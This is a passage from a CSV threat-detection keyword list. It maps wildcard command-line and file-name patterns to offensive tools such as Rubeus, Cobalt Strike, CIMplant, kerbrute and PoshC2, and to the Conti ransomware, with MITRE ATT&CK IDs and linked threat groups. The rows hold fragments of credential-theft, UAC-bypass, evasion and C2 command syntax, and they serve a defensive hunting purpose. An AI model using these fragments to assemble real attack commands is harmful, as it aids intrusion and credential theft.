tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-sonicwall-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-sybase-asa-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-tellstick-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-versant-locate.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-wake-on-lan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-wpad-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bropper.py*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"* brute * /password*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* BruteForce(*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"* --brute-ratel*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"* Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"* bruteuser *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"* build Dent.go*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"* -Build -NoAttackPaths*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"* build_letmeout*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"* BypassFramework.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"* BypassUac*.bat*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* BypassUac*.dll*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* BypassUac*.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* -c * --choose-mutators * -s 1*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"* -c * -o payload.ser*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"* -c *ExploitClass.cs*System.dll*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -c *OBFUSCATION=*.ps1*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"* -c '/accepteula /s calc.exe' -e PsExec64.exe*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","0","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" +"* -c active_users -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c all -d * --domaincontroller *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* -c command_exec --execute tasklist*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c command_exec --execute whoami*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"* -c edr_query *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c logon_events * -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c ls --directory * -u * -p *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c process_kill --process *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c service_mod --execute create -s *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c upload --fileto * --file *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c vacant_system * -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -c -w *.txt -w *.txt --ss *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -w methods.txt -p 127.0.0.1*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -w users.txt --hs *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -z file*users.txt -z file*pass.txt *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -z range*1-10 --hc=BBB http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* C:\ProgramData\sh.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* C:\temp\w.log*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"* C:\Users\Public\build.bat*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"* C:\Users\Public\build.vbs*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"* C:\Users\Public\DtcInstall.txt*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"* c2 add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* c2 start http *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* -c2server *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* --CaCertPath *.pfx --CaCertPassword *","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" +"* CallDirect.py*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" +"* CallStranger.py*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" +"* -caplet *.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* cassandra-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* cassandra-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 